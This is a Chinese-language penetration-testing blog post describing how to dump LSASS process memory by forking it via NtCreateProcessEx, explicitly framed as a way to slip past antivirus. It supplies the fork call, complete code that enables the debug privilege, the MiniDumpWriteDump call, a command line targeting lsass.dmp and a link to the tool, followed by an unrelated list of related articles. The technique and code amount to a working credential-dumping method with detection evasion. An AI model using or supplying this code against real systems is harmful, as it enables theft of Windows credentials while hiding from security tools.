「渗透技巧」利用Fork进程来Dump内存

简介: 「渗透技巧」利用Fork进程来Dump内存

使用远程进程分叉,可以用来转储 LSASS 分叉进程的内存,可能会绕过一些杀毒进行内存DUMP。

twitter上有人提到,可以用PROCESS_CREATE_PROCESS权限就可以克隆目标进程去读取任何东西。

主要用到了OpenProcessNtCreateProcessEx,就是类似于fork一个进程,然后我们去正常的MiniDumpWriteDump就可以获取目标进程的内存数据

要打开一个进程进行操作,我们通常先获取目标进程的句柄。通常使用OpenProcess()来获取

HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

第一个参数指定对进程的访问权限,具体可以指定的全部访问权限如链接:https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights

这个远程进程分叉用到的是PROCESS_CREATE_PROCESS

PROCESS_CREATE_PROCESS,此访问权限允许具有包含此访问权限的进程句柄的进程就可以代表该进程创建进程。

然后需要创建进程,用到的是NtCreateProcessEx

函数原型

NTSTATUS NtCreateProcessEx(
    __out PHANDLE ProcessHandle,
    __in ACCESS_MASK DesiredAccess,
    __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
    __in HANDLE ParentProcess,
    __in ULONG Flags,
    __in_opt HANDLE SectionHandle,
    __in_opt HANDLE DebugPort,
    __in_opt HANDLE ExceptionPort,
    __in ULONG JobMemberLevel
);

函数参数:

ProcessHandle,输出参数,如果创建成功,则它返回所创建的进程的句柄。
DesiredAccess, 新进程的访问权限。
ObjectAttributes,可选参数,指定了新进程的对象属性。
ParentProcess:新进程的父进程句柄。如果这个参数没有设定,即新进程没有父进程,新进程使用系统地址空间创建。
Flags :进程创建的标志。
SectionHandle :内存区域映射句柄,用来创建进程的地址空间,**如果这个参数没有设定,新进程的地址空间是一个简单的克隆父进程的地址空间。**
DebugPort : 一个端口对象的句柄,被用于进程的调试端口。
ExceptionPort :一个端口对象的句柄,被用于进程的异常端口。
JobMemberLevel :新进程的在 jobset 中的等级。

通过为 SectionHandle 传递NULL 并为 ParentProcess参数传递目标的 PROCESS_CREATE_PROCESS 句柄,将创建远程进程的分支,攻击者将收到分支进程的句柄。此外,只要攻击者不创建任何线程,就不会触发进程创建回调。这意味着攻击者可以读取目标的敏感内存,而AV甚至不知道子进程已经创建。

NtCreateProcessEx(&this->CurrentSnapshotProcess,
          PROCESS_ALL_ACCESS,
          NULL,
          this->TargetProcess,
          0,
          NULL,
          NULL,
          NULL,
          0);

然后正常的赋予debug的priv并且dump即可

提升debug权限:

BOOL
EscalateDebugPrivilege (
    VOID
    )
{
    BOOL result;
    HANDLE currentToken;
    LUID currentDebugValue;
    TOKEN_PRIVILEGES newTokenPrivilege;
    result = FALSE;
    currentToken = NULL;
    //
    // Open the current processes' token.
    //
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &currentToken) == FALSE)
    {
        printf("Failed to open the token of the current process with the last error %i.\n", GetLastError());
        goto Exit;
    }
    //
    // Lookup the LUID of the debug privilege.
    //
    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &currentDebugValue) == FALSE)
    {
        printf("Failed to lookup the current debug privilege with the last error %i.\n", GetLastError());
        CloseHandle(currentToken);
        goto Exit;
    }
    //
    // Create our elevated token privilege.
    //
    newTokenPrivilege.PrivilegeCount = 1;
    newTokenPrivilege.Privileges[0].Luid = currentDebugValue;
    newTokenPrivilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    //
    // Adjust the current processes' token.
    //
    if (AdjustTokenPrivileges(currentToken, FALSE, &newTokenPrivilege, sizeof(newTokenPrivilege), NULL, NULL) == FALSE || 
        GetLastError() != ERROR_SUCCESS)
    {
        printf("Failed to adjust debug privileges with the last error %i.\n", GetLastError());
        CloseHandle(currentToken);
        goto Exit;
    }
    result = TRUE;
Exit:
    if (currentToken)
    {
        CloseHandle(currentToken);
    }
    return result;
}

MiniDump:

if (MiniDumpWriteDump(snapshotProcess, GetProcessId(snapshotProcess), dumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL) == FALSE)
    {
        printf("Failed to create a dump of the forked process with the last error %i.\n", GetLastError());
        goto Exit;
    }

用法:

ForkDump-x64.exe lsass.dmp 656

https://github.com/D4stiny/ForkPlayground

相关文章
|
27天前
麒麟系统mate-indicators进程占用内存过高问题解决
【10月更文挑战第7天】麒麟系统mate-indicators进程占用内存过高问题解决
119 2
|
2月前
|
存储 Linux 调度
深入理解操作系统:从进程管理到内存分配
【8月更文挑战第44天】本文将带你深入操作系统的核心,探索其背后的原理和机制。我们将从进程管理开始,理解如何创建、调度和管理进程。然后,我们将探讨内存分配,了解操作系统如何管理计算机的内存资源。最后,我们将通过一些代码示例,展示这些概念是如何在实际操作系统中实现的。无论你是初学者还是有经验的开发者,这篇文章都将为你提供新的视角和深入的理解。
|
1月前
|
缓存 算法 调度
深入浅出操作系统:从进程管理到内存优化
本文旨在为读者提供一次深入浅出的操作系统之旅。我们将从进程管理的基本概念出发,逐步深入到内存管理的复杂世界,最终探索如何通过实践技巧来优化系统性能。文章将结合理论与实践,通过代码示例,帮助读者更好地理解操作系统的核心机制及其在日常技术工作中的重要性。无论你是初学者还是有一定经验的开发者,这篇文章都将为你打开一扇通往操作系统深层次理解的大门。
|
29天前
麒麟系统mate-indicators进程占用内存过高问题解决
【10月更文挑战第5天】麒麟系统mate-indicators进程占用内存过高问题解决
107 0
|
2月前
|
存储 监控
【Azure Cloud Service】在Azure云服务中收集CPU监控指标和IIS进程的DUMP方法
在使用Cloud Service服务时,发现服务的CPU占用很高,在业务请求并不大的情况下,需要直到到底是什么进程占用了大量的CPU资源,已经如何获取IIS进程(w3wp.exe)的DUMP文件?
|
2月前
|
监控 Ubuntu API
Python脚本监控Ubuntu系统进程内存的实现方式
通过这种方法,我们可以很容易地监控Ubuntu系统中进程的内存使用情况,对于性能分析和资源管理具有很大的帮助。这只是 `psutil`库功能的冰山一角,`psutil`还能够提供更多关于系统和进程的详细信息,强烈推荐进一步探索这个强大的库。
41 1
|
2月前
|
存储 运维
.NET开发必备技巧:使用Visual Studio分析.NET Dump,快速查找程序内存泄漏问题!
.NET开发必备技巧:使用Visual Studio分析.NET Dump,快速查找程序内存泄漏问题!
|
2月前
|
缓存 Linux C语言
C语言 多进程编程(六)共享内存
本文介绍了Linux系统下的多进程通信机制——共享内存的使用方法。首先详细讲解了如何通过`shmget()`函数创建共享内存,并提供了示例代码。接着介绍了如何利用`shmctl()`函数删除共享内存。随后,文章解释了共享内存映射的概念及其实现方法,包括使用`shmat()`函数进行映射以及使用`shmdt()`函数解除映射,并给出了相应的示例代码。最后,展示了如何在共享内存中读写数据的具体操作流程。
|
2月前
|
Linux Windows
检测进程内存的活跃程度
检测进程内存的活跃程度
|
2月前
使用qemu来dump虚拟机的内存,然后用crash来分析
使用qemu来dump虚拟机的内存,然后用crash来分析